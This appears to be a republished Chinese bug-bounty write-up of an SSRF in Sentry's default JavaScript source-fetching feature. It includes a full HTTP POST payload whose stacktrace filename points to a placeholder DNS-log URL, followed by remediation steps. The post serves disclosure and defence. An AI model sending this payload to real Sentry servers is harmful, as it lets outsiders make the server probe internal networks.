记录一次某SRC的SSRF挖掘-top10漏洞挖掘

admin 2023年12月20日09:13:51评论23 views字数 1133阅读3分46秒阅读模式

0x01前言

Sentry中Enable JavaScript source fetching(源码预获取)的选项是默认打开的,这个选项的作用是去抓取上报的错误JSON中的stack trace中的filename对应的url对应的代码,所以部署sentry的服务器会盲目的GET请求坏人的url,坏人就达到了通过我们自己的服务器发起恶意请求的攻击目的,可以从外网来攻击内网(SSRF)

文章末尾领取资料

记录一次某SRC的SSRF挖掘-top10漏洞挖掘

记录一次某SRC的SSRF挖掘-top10漏洞挖掘

 POST /api/1/store/?sentry_version=7&sentry_client=raven-js%2f3.15.0&sentry_key=xxxxxxxxxxxxxxxxxxxxxxx11d0f87 HTTP/1.1Host: xxx.xxx.xxx.xxxUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: zh-CN,zh;q=0.9Content-type: application/jsonOrigin:https://xxx.xxx.xxx.xxx

{"project":"30","logger":"javascript","platform":"javascript","exception":{"values":[{"type":"Error","value":"Trying to get control scope but angular isn't ready yet or something like this","stacktrace":{"frames":[{"filename":"http://dnslog/","lineno":110,"colno":81071,"function":"xmlHttpRequest.o","in_app":true}]}}]}}

记录一次某SRC的SSRF挖掘-top10漏洞挖掘

记录一次某SRC的SSRF挖掘-top10漏洞挖掘

修复方式:

  1. sentry关闭 source code scrapping;
  2. 保证配置文件中的黑名单不为空:/sentry/conf/server.py
  3. 关闭源码抓取,隐藏sentry_key

记录一次某SRC的SSRF挖掘-top10漏洞挖掘

原文始发于微信公众号(渗透安全HackTwo):记录一次某SRC的SSRF挖掘-top10漏洞挖掘

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月20日09:13:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记录一次某SRC的SSRF挖掘-top10漏洞挖掘https://cn-sec.com/archives/2318787.html

发表评论

匿名网友 填写信息